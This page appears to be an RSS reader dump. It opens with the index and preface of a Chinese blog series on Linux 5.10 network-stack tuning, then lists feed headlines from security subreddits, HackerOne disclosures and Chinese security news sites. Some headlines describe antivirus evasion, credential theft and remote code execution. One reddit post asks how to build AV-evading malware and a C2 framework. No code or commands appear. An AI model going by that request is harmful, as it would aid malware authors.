    本文尝试从技术研发与工程实践(而非纯理论学习)角度,在原理与实现、监控告警、 配置调优三方面介绍内核5.10 网络栈。由于内容非常多,因此分为了几篇系列文章。 原理与实现 Linux 网络栈原理、监控与调优:前言 Linux 中断(IRQ/softirq)基础:原理及内核实现 Linux 网络栈接收数据(RX):原理及内核实现 Linux 网络栈发送数据(TX):原理及内核实现(TBD) 监控 Monitoring Linux Network Stack 调优 Linux 网络栈接收数据(RX):配置调优 Linux 网络栈发送数据(TX):配置调优(TBD) 作为网络、虚拟化、稳定性等方向的研发工程师,我们经常会遇到各种各样的网络问题。 按照著名的 80/20 定律, 这些问题中的 80% 都属于常规问题,通过系统或服务日志、历史经验或者 Google、StackOverflow 搜索解决;所花时间在几分钟到几个小时不等; 剩下的 20% 就无法快速定位并解决,需要一些额外专业知识和时间来排查,例如,粗看一些相关代码,把可疑点提交到社区或邮件列表讨论等等;所花时间在几个小时到几天不等。 如果对这 20% 再用一次 80/20 定律,那这 20% 里面, 80% 的问题(20% * 80% = 16%)都能通过几个小时或几天的看代码、测试或社区帮助来解决, 剩下的 20%(20% * 20% = 4%),就需要更加深入的钻研才有可能定位到问题。 如果你愿意,还可以再用 80/20 法则继续分下去,第三次剩下的将是 0.8% —— 这个长尾 已经足够小了,但解决这些问题花费的时间一般也足够长。 对于这一部分(性能)问题,我们必须系统地学习整个网络栈,理解数据包从到达 网卡之后分别经过哪些模块、进行什么处理,一直到最终被应用程序收起的整个过程,没 有其他捷径,除非你们的业务方能忍受这份长尾,或者通过工程手段绕过这些问题, 例如最简单的加机器降负载。但在云原生时代、网络可编程的今天,功能需求也同样要求我们具备 内核网络栈这一领域知识。例如,K8s 是采用了非常灵活的 spec & impl 设计,它以契约规范的方式描述了很多 k8s 的功能应该是什么样,而具体实现则交给开发者或厂商,网络相关的两个例子: ServiceIP:抽象了一个 L4 负载均衡方案,怎么实现、用什么技术来实现完全由网络方案来决定; NetworkPolicy:抽象了一个 L3/L4 访问控制方案,怎么实现、用什么技术来实现也是完全由网络方案来决定; 如果让你来实现这两个方案(demo),你觉得需要哪些网络知识?需要熟悉网络栈的哪些模块和子系统?熟悉到什么程度? 两篇参考: Cracking Kubernetes Node Proxy (aka kube-proxy) Cracking Kubernetes Network Policy 有了对内核网络的完整理解,就会发现一片新天地,对于前面那若干层 “80” 问题,也会有完全不一样的认识。 早年的 Linux 网络栈监控和调优:接收数据(2016) 因为很多原因在今天的参考价值越来越小: 内核和网卡驱动太老(kernel 3.13,1Gbps 网卡驱动 igb),尤其对容器和网络虚拟化团队,这种配置都是古董机了: 全是文字,没有图,非常不直观(后来原作者有一篇配套图解,但只有几张图,也已经太老了); 监控和调优杂内容糅在代码分析里,略乱,无法快速检索;一些调优建议已经过时; 没有介绍如何用比较现代的监控体系,例如 Prometheus+Grafana,来可视化监控核心指标; … 本文参考了那篇文章的主线,基于新内核重新整理了整个网络栈处理过程和一些监控调优选项, Kernel 基于 5.10,网卡基于 Mellanox 25Gbps mlx5_core 驱动; 添加了二十多张核心模块的流程图和调用栈,更直观,帮助理清主线; 将监控和调优部分单独拆出来,方便快速检索与查阅,避免在琐碎细节之间跳来跳去;根据内核版本和生产经验更新了一些调优建议; 展示了如何基于现代监控系统来监控网络指标; 适当添加了一些近几年出现的新内容,例如 BPF/XDP。 本文写的是 “Linux networking stack”,这里的 “stack” 指的不仅仅是内核协议栈, 而是包括内核协议栈在内的、从数据包到达物理网卡到最终被用户态程序收起的整个路径, 如下图所示(接收数据路径和步骤): Fig. Steps of Linux kernel receiving data process and the corresponding chapters in this post 本文还有很多地方不完善,可能还有一些错误,仅作学习参考,后续会不定期更新。
    Linux 网络栈接收数据(RX):配置调优
    本文尝试从技术研发与工程实践(而非纯理论学习)角度,在原理与实现、监控告警、 配置调优三方面介绍内核5.10 网络栈。由于内容非常多,因此分为了几篇系列文章。 原理与实现 Linux 网络栈原理、监控与调优:前言 Linux 中断(IRQ/softirq)基础:原理及内核实现 Linux 网络栈接收数据(RX):原理及内核实现 监控 Monitoring Linux Network Stack 调优 Linux 网络栈接收数据(RX):配置调优 1 网络设备驱动初始化 1.1 调整 RX 队列数量(ethtool -l/-L) 1.2 调整 RX 队列大小(ethtool -g/-G) 1.4 调整 RX 队列权重(ethtool -x/-X) 1.5 调整 RSS RX 哈希字段(ethtool -n/-N) 1.6 Flow 绑定到 CPU:ntuple filtering(ethtool -k/-K, -u/-U) 2 网卡收包 3 DMA 将包复制到 RX 队列 4 IRQ 4.1 中断合并(Interrupt coalescing,ethtool -c/-C) 4.2 调整硬中断亲和性(IRQ affinities,/proc/irq//smp_affinity) 5 SoftIRQ 5.1 问题讨论 关于 NAPI pool 机制 perf 跟踪 IRQ/Softirq 调用 /proc/net/softnet_stat 各字段说明 5.2 调整 softirq 收包预算:sysctl netdev_budget/netdev_budget_usecs 6 softirq:从 ring buffer 收包送到协议栈 6.1 修改 GRO 配置(ethtool -k/-K) 6.2 sysctl gro_no…
    Linux 网络栈接收数据(RX):原理及内核实现
    Fig. Steps of Linux kernel receiving data process and the corresponding chapters in this post 本文尝试从技术研发与工程实践(而非纯理论学习)角度,在原理与实现、监控告警、 配置调优三方面介绍内核5.10 网络栈。由于内容非常多,因此分为了几篇系列文章。 原理与实现 Linux 网络栈原理、监控与调优:前言 Linux 中断(IRQ/softirq)基础:原理及内核实现 Linux 网络栈接收数据(RX):原理及内核实现 Linux 网络栈发送数据(TX):原理及内核实现(TBD) 监控 Monitoring Linux Network Stack 调优 Linux 网络栈接收数据(RX):配置调优 Linux 网络栈发送数据(TX):配置调优(TBD) 0 收包过程(RX)俯瞰 1 网卡驱动初始化 1.1 A little bit things about Mellanox NIC drivers 1.2 驱动模块注册:module_init() -> init() -> pci/mlx5e init 1.3 PCI 相关初始化 1.3.1 PCI 驱动列表注册:pci_register_driver() 1.3.2 内核为网卡搜索和加载驱动:pci_driver->probe() 调用栈和流程图 初始化 devlink:mlx5_devlink_alloc() 初始化 debugfs 和一些 WQ:mlx5_mdev_init() 初始化 PCI 相关部分:mlx5_pci_init() 初始化硬中断(IRQ)、设置网卡状态为 UP:mlx5_load_one() 1.4 以太网相关初始化:mlx5e_init() …
    Linux 中断(IRQ/softirq)基础:原理及内核实现
    1 什么是中断? 2 硬中断 2.1 中断处理流程 2.2 Maskable and non-maskable 2.3 问题:执行足够快 vs 逻辑比较复杂 2.4 解决方式:延后中断处理(deferred interrupt handling) 3 软中断 3.1 软中断子系统 3.2 主处理 3.3. 避免软中断占用过多 CPU 3.4 硬中断 -> 软中断 调用栈 软中断触发执行的步骤 4 三种推迟执行方式(softirq/tasklet/workqueue) 4.1 softirq 内部组织 触发(唤醒)softirq 4.2 tasklet 4.3 workqueue 使用场景 结构体 参考资料 中断(IRQ),尤其是软中断(softirq)的重要使用场景之一是网络收发包, 但并未唯一场景。本文整理 IRQ/softirq 的通用基础,这些东西和网络收发包没有直接关系, 虽然整理本文的直接目的是为了更好地理解网络收发包。 1 什么是中断? CPU 通过时分复用来处理很多任务,这其中包括一些硬件任务,例如磁盘读写、键盘输入,也包括一些软件任务,例如网络包处理。 在任意时刻,一个 CPU 只能处理一个任务。 当某个硬件或软件任务此刻没有被执行,但它希望 CPU 来立即处理时,就会给 CPU 发送一个中断请求 —— 希望 CPU 停下手头的工作,优先服务“我”。 中断是以事件的方式通知 CPU 的,因此我们常看到 “XX 条件下会触发 XX 中断事件” 的表述。 两种类型: 外部或硬件产生的中断,例如键盘按键。 软件产生的中断,异常事件产生的中断,例如除以零 。 管理中断的设备:Advanced Programmable Interrupt Controller(APIC)。 2 硬中断 2.1 中断处理流程 中断…

  • Open

    Distros and RegRipper, pt deux
    Now and again I pop my head up and take a look around to see where RegRipper has been, and is being, used. My last blog post on this topic had quite a few listings, but sometimes changing the search terms reveals something new, or someone else has decided to use RegRipper since the last time I looked. References to RegRipper go way back, almost as far as RegRipper itself (circa 2008): SANS blog (2009) SANS blog (2010) SANS Infosec Handler's Diary blog (2012) Kali Tools (RR v2.5) SANS Blog, Mass Triage, pt 4 (2019) The latest commercial forensics platform that I've found that employs RegRipper is Paraben E3. I recently took a look at the evaluation version, and found "rip.pl" (RegRipper v3.0 with modifications) in the C:\Program Files\Paraben Corporation\Electronic Evidence Examiner\PerlSmartAnalyzer folder, along with the "plugins" subfolder. You can see the Registry parsing in action and how it's incorporated into the platform at the Paraben YouTube Channel: AppCompatCache parsing Reviewing Data from AmCache Reviewing the videos, there's something very familiar about the output illustrated on-screen. ;-) Other Resources (that incorporate RegRipper) YouTube video by Ric Messier CAINE forensics video PacktPub Subscription LIFARS Whitepaper on Shellbags Windows Registry Forensics, 1/e (PDF) Paradigm Solutions blog Jason Shaver's NPS thesis (2015) That's just one more step toward world domination! This is where I tent my fingers and say "Excellent" like Mr. Burns! PS: While I was looking around recently, I saw something I hadn't seen before...early in Jan, 2020, an issue with the Parse::Win32Registry module parsing 64-bit time stamps was identified. I'd updated the module code, recompiled the EXEs, and put them up on Github.  I found recently that James, the author of the module, had updated it in Sept, 2020. That's great, but there are a few other tweaks I'd made to the code, one that allowed me to check to see if hives are 'dirty'.
  • Open

    GitLab远程代码执行漏洞(CVE-2022-2185)
    GitLab远程代码执行漏洞,该问题影响从 14.0 到 14.10.5、从15.0 到15.0.4以及从 15.1 到 15.1.1 的所有版本,其中授权用户可以导入恶意制作的项目,从而导致远...
  • Open

    GitLab远程代码执行漏洞(CVE-2022-2185)
    GitLab远程代码执行漏洞,该问题影响从 14.0 到 14.10.5、从15.0 到15.0.4以及从 15.1 到 15.1.1 的所有版本,其中授权用户可以导入恶意制作的项目,从而导致远...
  • Open

    What is being a malware analyst like?
    What is being a malware analyst like? How many hours do you guys work? Is it stressful? What certificate do I need to become a malware analyst? submitted by /u/ELIDAL99 [link] [comments]
    Email/Password vs Social Login vs Passwordless(magic links), which one is most vulnerable and how to choose the best strategy for users
    As a developer of user authentication library, I get asked this question a lot. This is definitely a subjective question and I struggle to answer this appropriately other than saying "it depends". So I want to open up this question to this knowledgeable community for opinions on how can developers choose the right authentication strategy for their users. Your experience as NetSec can be really valuable in educating the developers. You don't need to answer everything, just pick one aspect and share your thoughts. By the end of the discussion, we will have a useful conversation that developers can learn from. submitted by /u/10xpdev [link] [comments]
    SANS SEC 560 Class Notes by Jeff McJunkin
    Found this old tweet from Jeff McJunkin for his SANS SEC560 class in Minneapolis. https://twitter.com/jeffmcjunkin/status/755395680194039808 I thought it might be useful to the infosec community especially to those who are planning to take this exam. You can find the doc here. https://docs.google.com/document/d/19qp1aLg8LG8_lT0a-R-ilXIq0rCXKAR011Nj1pVo5TI/edit Not sure if he keep updating this doc or not since he tweeted this 6 years ago. If you happen to know, let me know. Thanks submitted by /u/w0lfcat [link] [comments]
  • Open

    June 2022 Incident Report
    HackerOne disclosed a bug submitted by jobert: https://hackerone.com/reports/1622449
    Unauthorized Access - downgraded admin roles to none can still edit projects through brupsuite
    Omise disclosed a bug submitted by zombieesshx: https://hackerone.com/reports/1607756
  • Open

    Any idea what's going on here?
    Found this in a Google search: http://82.146.38.215/text/ ​ Appears to be arrays of text snippets randomly collected and loosely related to the subject implied by each filename. In the middle of a file on customer complaints, there appears to be text from websites about cookie policies, which makes me think this is randomly collected. Do these look like fragments to form random text at the end of spam messages? Phrases for training a neural network? Something else? Just curious. submitted by /u/CommanderPowell [link] [comments]
    Not sure what this is -- Modules. Maybe someone could explain.
    submitted by /u/brother_p [link] [comments]
    Incel 101
    submitted by /u/brother_p [link] [comments]
    solar panel wiring diagrams and manuals
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Just found this
    submitted by /u/thiskeepsmeupatnight [link] [comments]
    wget (maybe) help?
    Hi. Newb here. Not exactly OD related, buuuut I was wondering if someone could share a wget script, app, link or anything of the sort to help me download some files. The sites not online anymore, but I can access the files (.jpgs) via wayback machine. An example url would be something like http://superkewlfictionalwebsite.com/pics/superkewlpic.jpg Or https://web.archive.org/web/2014*/http://superkewlfictionalwebsite.com/pics/superkewlpic.jpg Many thanks in advance submitted by /u/bweezy320 [link] [comments]
  • Open

    War in Ukraine / June 30
    Russia left Snake island. It seems completely Continue reading on Medium »
  • Open

    SecWiki News 2022-07-01 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-07-01 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Building a scalable static analysis program at Razorpay
    submitted by /u/jubbaonjeans [link] [comments]
    Intel SGX deprecation review
    submitted by /u/hardenedvault [link] [comments]
    It’s Been Zero Days Since BIND9 Crashed
    submitted by /u/jen140 [link] [comments]
  • Open

    IW Weekly #5: Account Takeover, Recon, Ransomware Creation, and more.
    No content preview
    Let’s Understand SSRF vulnerability
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    IW Weekly #5: Account Takeover, Recon, Ransomware Creation, and more.
    No content preview
    Let’s Understand SSRF vulnerability
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    IW Weekly #5: Account Takeover, Recon, Ransomware Creation, and more.
    No content preview
    Let’s Understand SSRF vulnerability
    Introduction Continue reading on InfoSec Write-ups »
  • Open

    FreeBuf 周报 | 8月1日起施行《互联网用户账号信息管理规定》;加拿大前政府雇员参与勒索攻击
    经报网络安全审查办公室同意,BOSS 直聘、运满满、货车帮恢复新用户注册。
    Black Basta 勒索软件利用 QakBot 进行分发
    自 2022 年 4 月投入运营以来,Black Basta 对全球近 50 家组织发起了攻击。攻击者使用了“双重勒索”策略,如果受害者不交付赎金就会被公开数据。
    Revive:从间谍软件进化成银行木马
    2022 年 6 月,Cleafy 研究人员发现了一个新的安卓银行木马 Revive。
    「斗象攻防演练宝典」之“红队隐蔽隧道检测”
    象守结合隐蔽隧道静态特征和隐蔽隧道模型,让隐蔽隧道通讯攻击无处藏身。
    攻防演练中如何“防钓鱼” | FreeBuf甲方群话题讨论
    HVV期间,钓鱼实战手法可能花样百出,那可以有何检测防御措施?在钓鱼实战中,可以有哪些策略有效检验员工的安全意识?
    BlueHound-一款自研主机威胁狩猎工具
    BlueHound 是一款GUI版本主机威胁狩猎工具。支持上机/离线扫描webshell、CobaltStrike的beacon程序扫描以及内存扫描,基于.NET 4.6编译。
    企业安全建设 | 信息安全建设实践路程思考
    企业在进行信息安全建设规划时,“纵深防御”体系成为多数企业适用的架构参考,在其思想指导下,为了构建完善的安全防护体系和不断提升安全防护能力,对信息安全工作进行顶层架构设计和全面的规划布局属于第一要务。
    直指word附件,勒索软件AstraLocker 2.0来袭!
    近期,一种鲜为人知的名为AstraLocker的勒索软件发布了它的第二个主要版本。
    恶意软件利用API Hammering 技术规避沙盒检测
    研究人员在最近发现的 Zloader 和 BazarLoader 样本中发现了沙盒规避技术 API Hammering 的新实现。
    MuddyWater 持续瞄准中东发起攻击
    MuddyWater 被认为是由伊朗革命卫队运营的组织,主要维护伊朗的国家利益。
    FreeBuf咨询×漏洞盒子联合发布《2022网络安全攻防视图》
    CSAD 视图囊括泛行业网络安全攻击路径图、泛行业网络安全防御路径图、环境安全布局图以及安全运营团队搭建图。
  • Open

    Learn about Docker Container Security in Detail
    Are you looking for a series of posts that take a deep look at containers from an information security perspective? In my blog's "Docker Container Security" series, I've got you covered. https://tbhaxor.com/docker-containers-security/ submitted by /u/tbhaxor [link] [comments]
    How to get started with malware development?
    Hi, I want to get started with malware development. I am familiar with python,c/cpp and asm32. I want to learn to build my own malware(complete control with win32 api) and a C2 framework. I recently finished asm and made my own shellcode encoder that brought down detection rate from 11 to 3. I want to build malware with av and der bypassed. I have just started learning bout win32 api but it feels like I’m missing a lot of concepts like handles, tchars etc which I don’t know about. There are just so many things to learn like win32 api, process injection etc and I have no idea where to start. Any help suggesting and ideal pathway would be really helpful. submitted by /u/Horse-Trojan [link] [comments]
    Free Course online: Introduction to Cybersecurity by Cisco Networking Academy
    submitted by /u/cybersocdm [link] [comments]
  • Open

    what's the diffrent between logical copy to physical copy in windows forensics image?
    what's the main targets between them? submitted by /u/ArticleUseful211 [link] [comments]
    Free Course online: Introduction to Cybersecurity by Cisco Networking Academy
    submitted by /u/cybersocdm [link] [comments]

  • Open

    Feishu / Lark Data Extraction
    Has anybody dealt with Feishu/Lark before? I need to export files and chat conversations and none of my tools (axiom, cellebrite) are capable of Extracting the data submitted by /u/Markarov_93 [link] [comments]
    How can I create my own tool to acquire RAM memory?
    Hi community … I want to build a tool like Belkasoft RAM capturer … But I’m not getting any idea about how to capture RAM via C or Python … Any suggestions would be great … thanks in advance submitted by /u/Aromatic_Ideal_2933 [link] [comments]
    Data recovery on a Lumia 550
    Internal data recovery I'm MSFT LUMIA 550, no sd card. Hey, I have been given a MSFT Lumia 550 to try and recover the internal data that has been lost but not having any luck. I run Windows and Linux, and have data recovery software for phones and Windows but it is not showing on either one? It shows on the file explorer but not in Disk Management or AOMEI Partition Assistant. Screen works and no other issues. If anyone could advise or point me in the right direction it would be great. Device information Model: Microsoft Lumia 550 19:43 Service provider: 02 Software: Windows 10 Mobile Installed RAM: 1 GB Version: 1709 OS build: 10.0.15254.527 Firmware revision number: 01078.00042.16352.50009 Hardware revision number: 3.0.0.1 Radio software version: 10c56.00030.0001 Chip SOC version: 8909 Screen resolution: 720x1280 submitted by /u/sudo_oth [link] [comments]
    Time Machine encrypted with Filevault2 wont accept known password.
    History: MacBook 15" Samsung 1TB AHCI SSD died, non recoverable (S4LN058A01 controller not supported in PC3000, degraded memory, corrupted firmware/bad bytes...), won't ID, any interaction with it will stay in BSY mode, won't clone. The only hope now was the Time Machine backup (Filevault2). This is with Monterey OSX. Time Machine backup is 1.5TB in iSCSI format, but I cloned it to a .img format to work with it now.I must say this backup was used everyday, and it would mount automatically when logged into the computer. There were two users, user1 and user2, both with the same password. Both admin. Password has been the same for years, but suddenly time machine wont mount, saying credentials are incorrect. I have seen this scenario happen to a lot of people over the years. There is also…
  • Open

    Advice on SEC599 vs SEC699
    Hi there, I'm seeking advice for a SANS course (or similar; money being no object for a single course) I did SEC555 a while ago but I'm not really into setting up SIEM anymore, more focused into devising new detection rules (that colleagues will be implementing). I'm very much "blue", not really into pure red courses/exams like OSCP or GPEN, but am interested in purple but my main driver is to learn new stuff as much as possible. We have fairly mature SIEM(s) with existing rules, and people reviewing and/or thinking about new ones. I'm already familiar with MITRE Att&ck and started prioritizing techniques for my domain of interest. What I'm looking for is a course that would bring the most value to my team, new ideas or ideas that we didn't think about, challenging the MITRE techniques prioritization, etc. I've looked at both 599 and 699 (even the 599 vs 699 FAQ on the SANS website) but can't decide... haven't found many reviews for 699. I wonder how much of 599 will be a refresh for me. I've also considered FOR572 because I've always wanted to do it, and we don't do much with the flows... I think we could get some low hanging fruits there (a NDR solution is being set up). Any advice or experience you can share is welcome, thanks! submitted by /u/FreshGap5328 [link] [comments]
    What should be checked to give network access from internal to external IP?
    Hello. I wonder how this happens in other companies. Perhaps you could share your experiences. Often I am asked by devs to change or create the firewall rules for their dev needs. Sometimes, it's hard for me to know how safe it is. If the request is from internal to external: 1) I'm checking to see if there are vulnerabilities on my machine that will have access the external IP. 2) I'm checking by any SSL checkers about encryption status on external IP/URL. 3) I always ask to be given a more specific IP ranges and ports. What kind of playbooks do you have? submitted by /u/athanielx [link] [comments]
  • Open

    Flubot: the evolution of a notorious Android Banking Malware
    submitted by /u/Goovscoov [link] [comments]
    RanSim: a ransomware simulation script written in PowerShell. Useful for testing your defenses and backups in a controlled simulation. The same script is used for encryption and decryption.
    submitted by /u/doctormay6 [link] [comments]
    Weaponizing and Abusing Hidden Functionalities Contained in Office Document Properties
    submitted by /u/McLabraid [link] [comments]
    Cloudy with a Chance of Risk: Managing Risks in Cloud-Managed OT Networks
    submitted by /u/c_f13 [link] [comments]
    How to expose a potential cybercriminal due to misconfigurations
    submitted by /u/CyberMasterV [link] [comments]
    Starting an AppSec program the simple way
    submitted by /u/theappsecteam [link] [comments]
    Golang code review notes by elttam
    submitted by /u/Gallus [link] [comments]
  • Open

    What Does Zero-Day Vulnerability Mean?
    Article URL: https://pacgenesis.com/what-does-zero-day-vulnerability-mean/ Comments URL: https://news.ycombinator.com/item?id=31938463 Points: 1 # Comments: 0
  • Open

    GitHub - lawndoc/RanSim: Ransomware simulation script written in PowerShell. Useful for testing defenses and backup in a controlled setting. The same script and key is used for decryption.
    submitted by /u/doctormay6 [link] [comments]
    New Offsec post: Weaponizing and Abusing Hidden Functionalities Contained in Office Document Properties
    TJNull posted this a few hours ago on the Offensive Security Blog, seems to utilise macros within Office to gain leverage, seems pretty cool. it's called "Weaponizing and Abusing Hidden Functionalities Contained in Office Document Properties. Tweet: https://twitter.com/TJ_Null/status/1542507690441682945?t=aa7IB9DN9CAddzT-Wc7Kmg&s=19 Article: https://www.offensive-security.com/offsec/macro-weaponization/ Also a proof of concept Proof of concept: https://m.youtube.com/watch?v=8ZePZzdVQT8&feature=emb_logo submitted by /u/McLabraid [link] [comments]
    Toll fraud malware: How an Android application can drain your wallet
    submitted by /u/SCI_Rusher [link] [comments]
    Harvesting Browser Passwords from Windows Credential Vault — Mimikatz
    submitted by /u/Clement_Tino [link] [comments]
  • Open

    What are the most essential third-party risk management tools?
    Vulnerabilities in the supply chain may cause cyberattacks. It also means that the concerns or vulnerabilities in the supply chain may… Continue reading on Medium »
    Which company provides the best penetration testing services?
    At times, it may not be that easy to approach the best pen testing services. The market is full of unqualified professionals, misleading… Continue reading on Medium »
    Which company provides the best red team security consulting?
    It is not a straightforward question to answer as there are many established companies, which provide red team security assessment… Continue reading on Medium »
    HOW I HACKED A HEALTH INSTITUTION [Domain Admin Compromise]
    Hello everyone, today I will be bringing you a new war-story of mine that had just wrapped up in the recent months. At a high level, I was… Continue reading on Medium »
    Relaying NTLM Authentication from SCCM Clients
    tl;dr: Seriously, please disable NTLM Continue reading on Posts By SpecterOps Team Members »
  • Open

    Open redirect found on account.brave.com
    Brave Software disclosed a bug submitted by tabaahi: https://hackerone.com/reports/1338437 - Bounty: $300
    Arbitrary file download via "Save .torrent file" option can lead to Client RCE and XSS
    Brave Software disclosed a bug submitted by d3f4u17: https://hackerone.com/reports/963155 - Bounty: $200
    Arbitrary file download due to bad handling of Redirects in WebTorrent
    Brave Software disclosed a bug submitted by d3f4u17: https://hackerone.com/reports/975514 - Bounty: $150
    Redirecting users to malicious torrent-files/websites using WebTorrent
    Brave Software disclosed a bug submitted by d3f4u17: https://hackerone.com/reports/968328 - Bounty: $200
    Browser is not following proper flow for redirection cause open redirect
    Brave Software disclosed a bug submitted by abhinavsecondary: https://hackerone.com/reports/1579374 - Bounty: $500
  • Open

    OSINT e Pubblica Amministrazione (di nuovo)
    Qualche (breve) riflessione, completamente “a braccio”. Continue reading on Medium »
    War in Ukraine / June 29
    The oil embargo has not yet produced visible results Continue reading on Medium »
    Dispelling Russian Lies About the Missile Strikes in Kremenchuk
    On June 27th, 2022, two Kh-22 anti-ship missiles outfitted with upwards of 1,000kg of explosives struck targets in Kremenchuk, Ukraine. Continue reading on Medium »
  • Open

    Choosing your job role in cybersecurity
    No content preview
    All About String in Python
    No content preview
  • Open

    Choosing your job role in cybersecurity
    No content preview
    All About String in Python
    No content preview
  • Open

    Choosing your job role in cybersecurity
    No content preview
    All About String in Python
    No content preview
  • Open

    SecWiki News 2022-06-30 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-30 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Model ww2 things
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    6/30 XSS study log
    CORS Continue reading on Medium »

  • Open

    Securing mobile phones and apps, What endpoint solutions are you using?
    Hey everyone, currently working as a security admin at a mid-sized company. Lately I’ve been looking into different mobile phone security for our BYOD policy. As everyone knows, there’s been a bunch of phishing, OS exploits, and hacks on Instagram, which is primarily what our marketing team uses. My main concern being the phishing links or exploits that prevent the use of Instagram. I’ve already created visuals and ran the company through steps to ensure their safety when using the apps (Not clicking random links, sketchy links, giving out passwords, etc) but human error exists and I don’t want to be the one at fault if there’s an issue. Curious to know what everyone’s using at their companies, I’m looking beyond just VPN solutions as I feel we need something more secure and reliable like a full endpoint security system. So far I’ve been looking at Lookout, Check Point, and CrowdStrike, mainly because of their file protection systems in addition to apps, etc. Let me know! submitted by /u/psaiful28 [link] [comments]
    Creating Proxy like Burpsuite / ZAP Proxy
    Hi, any guide on creating tools like Burpsuite or Zap Proxy specifically the intercept module and the logger. I need to capture all the request including the HTTP Headers, request parameters and more Main Problem I already have a simple GUI Form (Java) literally GUI form without any functionality but I don't know how to get the request. If I remember correctly, during the installation of Burpsuite, the user should install a .cert file, should I also generate that one for my program? Thanks! submitted by /u/pldc_bulok [link] [comments]
  • Open

    Cryptographic failures in RF encryption allow stealing robotic devices | Cossack Labs
    submitted by /u/evilsocket [link] [comments]
    Exploiting Intel Graphics Kernel Extensions on macOS to Escape the Safari Sandbox
    submitted by /u/gaasedelen [link] [comments]
    CloudGoat detection_evasion Scenario: Avoiding AWS Security Detection and Response
    submitted by /u/hackers_and_builders [link] [comments]
    CVE-2022-28219: Unauthenticated XXE to RCE and Domain Compromise in ManageEngine ADAudit Plus
    submitted by /u/scopedsecurity [link] [comments]
    How to Steal Browser’s Autofill Credentials via Cross-Site Scripting (XSS)
    submitted by /u/obilodeau [link] [comments]
    How to Evade Windows Defender and Commercial AV with Msfvenom Payloads
    submitted by /u/entropydaemon6 [link] [comments]
  • Open

    OAuth Misconfiguration Leads To Pre-Account Takeover
    No content preview
    IW Weekly #4: BITB Attack, Hackthebox Walkthrough, Twitter Link Takeover, and more.
    No content preview
    Text Based Injection | Content Spoofing on ISRO Website
    No content preview
  • Open

    OAuth Misconfiguration Leads To Pre-Account Takeover
    No content preview
    IW Weekly #4: BITB Attack, Hackthebox Walkthrough, Twitter Link Takeover, and more.
    No content preview
    Text Based Injection | Content Spoofing on ISRO Website
    No content preview
  • Open

    OAuth Misconfiguration Leads To Pre-Account Takeover
    No content preview
    IW Weekly #4: BITB Attack, Hackthebox Walkthrough, Twitter Link Takeover, and more.
    No content preview
    Text Based Injection | Content Spoofing on ISRO Website
    No content preview
  • Open

    【安全通报】Apache Shiro权限绕过漏洞(CVE-2022-32532)
    Apache Shiro 1.9.1前的版本RegExPatternMatcher在使用带有“.”的正则时,可能会导致权限绕过。漏洞源于RegExPatternMatcher默认使用的正则匹配的“.”不会匹配换行...
  • Open

    【安全通报】Apache Shiro权限绕过漏洞(CVE-2022-32532)
    Apache Shiro 1.9.1前的版本RegExPatternMatcher在使用带有“.”的正则时,可能会导致权限绕过。漏洞源于RegExPatternMatcher默认使用的正则匹配的“.”不会匹配换行...
  • Open

    SecWiki News 2022-06-29 Review
    Advanced Windows TaskScheduler Playbook by ourren 在软件缺陷预测中使用软件可视化和迁移学习 by ourren 构建模块化调用图以实现NodeJS应用的安全扫描 by ourren 卫星安全从入门到进门 by ourren 浅谈企业安全建设“道”与“术”--道篇 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-29 Review
    Advanced Windows TaskScheduler Playbook by ourren 在软件缺陷预测中使用软件可视化和迁移学习 by ourren 构建模块化调用图以实现NodeJS应用的安全扫描 by ourren 卫星安全从入门到进门 by ourren 浅谈企业安全建设“道”与“术”--道篇 by ourren 更多最新文章,请访问SecWiki
  • Open

    read-only ethernet cable
    Hello, I'd like to make a read-only ethernet cable to sniff traffic to send it to snort. I found a lot of links on the web but some has lack of information other are to complex. I found this but it seems to me that it speak about a read-only one-way cable. Obviously I need a twa-way cable. Can you help me to find a simple how to ? thanks submitted by /u/SkyTeeth [link] [comments]
  • Open

    Big ol' pile of movies
    [ Removed by reddit in response to a copyright notice. ] submitted by /u/neofaust [link] [comments]
    Mamont's open FTP Index / Page 22 of 49
    submitted by /u/thiskeepsmeupatnight [link] [comments]
  • Open

    Active Directory Penetration Testing Sample Report
    There are bunch of web app pentest reports can be found on https://pentestreports.com/reports/ However, I did not see any report for Active Directory Penetration Testing Sample. If you happen to know, please share it here. Thanks submitted by /u/w0lfcat [link] [comments]
  • Open

    XSS Payload on TikTok Seller Center endpoint
    TikTok disclosed a bug submitted by aidilarf_2000: https://hackerone.com/reports/1554048 - Bounty: $1000

  • Open

    FabricScape: Escaping Service Fabric and Taking Over the Cluster
    FabricScape (CVE-2022-30137) is a privilege escalation vulnerability of important severity in Microsoft's Service Fabric, commonly used with Azure. The post FabricScape: Escaping Service Fabric and Taking Over the Cluster appeared first on Unit 42.
  • Open

    Abusing Cloudflare Workers
    submitted by /u/thorn42 [link] [comments]
    Zimbra unauthenticated RCE via unrar path traversal (CVE-2022-30333)
    submitted by /u/monoimpact [link] [comments]
    Hive Ransomware Decrypter Tool - KISA
    submitted by /u/CyberMasterV [link] [comments]
    CVE-2022-30522 - Apache httpd "mod_sed" DoS vulnerability
    submitted by /u/SRMish3 [link] [comments]
    Intune hacking: when is a "wipe" not a wipe
    submitted by /u/nopslider [link] [comments]
  • Open

    Forensic Tools for Browser Data
    Does anyone recommend any tool for extracting browser data? I am using Foxton Browser Examiner Trial, which is great. But are there any suggestions for other software similar to this? The data is partially damaged as it was deleted and then recovered. Any suggestions would be appreciated. The data is sitting in a folder rather than an installed OS. submitted by /u/niveapeachshine [link] [comments]
    Paladin Not Detecting Source Drive
